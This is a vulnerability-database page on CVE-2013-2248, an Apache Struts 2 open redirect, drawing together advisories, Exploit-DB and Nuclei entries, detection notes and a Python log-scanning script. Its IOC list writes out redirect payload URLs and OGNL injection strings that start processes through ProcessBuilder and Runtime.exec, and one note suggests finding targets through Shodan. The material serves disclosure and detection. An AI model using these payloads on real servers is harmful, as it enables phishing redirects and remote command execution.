CVE-2013-2248
Published: 2013-07-20
Priority: P3 · 44 · medium · CVSS 2.0: 5.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 94.65% (99.8th percentile)
Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
Affected
44 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | — | — |
Detection & IOCs (extracted from sources)
url: {{BaseURL}}/index.action?redirect:http://www.interact.sh/
url: http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
url: http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
url: http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
url: http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
url: http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
command: %{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}
command: %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}
yara
regex: '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
- Detect exploitation attempts by inspecting HTTP request parameters for the 'redirect:' or 'redirectAction:' prefixes in query strings or request bodies targeting any .action endpoint.
- Both %{expr} and ${expr} OGNL expression notation can be used in the redirect: / redirectAction: parameter values; filter for both patterns.
- Attack payloads may appear in both the query string and the HTTP request body; inspect both locations for redirect:/redirectAction: prefixed parameters.
- A successful exploit produces an HTTP 302 response with a Location header pointing to an attacker-controlled URL; monitor for 302 responses from .action endpoints where Location does not match the application's own domain.
- All Struts2 applications using DefaultActionMapper are vulnerable; fingerprint targets via Shodan/FOFA queries for 'apache struts', 'struts2 showcase', or 'struts problem report' in HTTP responses.
- ProcessBuilder-based OGNL payloads (new java.lang.ProcessBuilder) in redirect: parameters indicate active RCE exploitation beyond simple open redirect; alert on this string in HTTP parameters.
- The action: prefix can only be used for attacks if wildcard mapping is enabled in the Struts2 configuration; redirect: and redirectAction: are not constrained by configuration and are universally exploitable.
- After upgrading to 2.3.15.1+, redirect: and redirectAction: parameters are completely dropped and will no longer function; this may break existing application functionality relying on these prefixes.
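The request and response checks listed above can be combined into one log classifier. This is an added example, not code from any of the quoted sources; the function names, the `app.example.test` host and the sample records are constructed for illustration, and it assumes actions are mapped to the `.action` extension.

```python
import re
from urllib.parse import unquote_plus, urlsplit

PREFIX = re.compile(r"(redirect|redirectAction):(.*)", re.S)
OGNL = re.compile(r"[%$]\{")  # both %{expr} and ${expr} notations

def classify(target, body="", status=None, location=None,
             own_host="app.example.test"):  # own_host: assumed application host
    """Return sorted findings for one HTTP request/response pair."""
    path, _, query = target.partition("?")
    if not path.endswith(".action"):
        return []
    findings = set()
    # The prefixed parameter may arrive in the query string or the request body.
    for where, raw in (("query", query), ("body", body)):
        for param in raw.split("&"):  # split first, then decode each parameter
            m = PREFIX.match(unquote_plus(param))
            if not m:
                continue
            findings.add(f"prefix-in-{where}")
            if OGNL.search(m.group(2)):
                findings.add("ognl-expression")
            if "java.lang.ProcessBuilder" in m.group(2):
                findings.add("processbuilder")
    # A 302 whose Location leaves the application's own host.
    if status == 302 and location:
        host = urlsplit(location).hostname
        if host and host != own_host:
            findings.add("offsite-302")
    return sorted(findings)

# Constructed sample records: (request target, body, status, Location header)
SAMPLES = [
    ("/struts2-showcase/fileupload/upload.action?redirect:http://phish.example.net/",
     "", 302, "http://phish.example.net/"),
    ("/employee/save.action", "name=a&redirectAction:%25%7B1%2B1%7D", 200, None),
    ("/x.action?redirect:%24%7Bnew%20java.lang.ProcessBuilder()%7D", "", 200, None),
    ("/login.action?user=bob", "", 302, "/home.action"),
    ("/static/page.html?redirect:http://phish.example.net/", "", 200, None),
]

def scan(samples=SAMPLES):
    return [classify(*s) for s in samples]

if __name__ == "__main__":
    for sample, result in zip(SAMPLES, scan()):
        print(sample[0], "->", result or "clean")
```

Relative `Location` values such as `/home.action` carry no host and are treated as on-site, so ordinary post-login redirects do not alert.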
OSV
Open redirect in Apache Struts
osv·2022-05-17
CVE-2013-2248 [MEDIUM] Open redirect in Apache Struts
The Struts 2 DefaultActionMapper used to support a method for short-circuit navigation state changes by prefixing parameters with "redirect:" or "redirectAction:", followed by a desired redirect target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. Attackers could use this to redirect to arbitrary web sites and conduct phishing attacks.
In Struts 2 before 2.3.15.1 the information following "redirect:" or "redirectAction:" can easily be manipulated to redirect to an arbitrary location.
GHSA
Open redirect in Apache Struts
ghsa·2022-05-17
CVE-2013-2248 [MEDIUM] CWE-20 Open redirect in Apache Struts
No detection rules found.
Exploit-DB
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
exploitdb·2014-01-14·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
...
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
As stated already, there are four
Exploit-DB
Apache Struts 2.2.3 - Multiple Open Redirections
exploitdb·2013-07-16
CVE-2013-2248 Apache Struts 2.2.3 - Multiple Open Redirections
---
source: https://www.securityfocus.com/bid/61196/info
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable.
http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23
Nuclei
Apache Struts - Multiple Open Redirection Vulnerabilities
nuclei·CVSS 5.8
CVE-2013-2248 [MEDIUM] Apache Struts - Multiple Open Redirection Vulnerabilities
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
Template:
id: CVE-2013-2248
info:
  name: Apache Struts - Multiple Open Redirection Vulnerabilities
  author: 0x_Akoko
  severity: medium
  description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
  impact: |
    An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware.
  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
  reference:
    - https://www.exploit-db.com/exploits/38666
    - https://nvd.nist.gov/vu
http://struts.apache.org/release/2.3.x/docs/s2-017.html
http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
http://www.securityfocus.com/bid/61196
http://www.securityfocus.com/bid/64758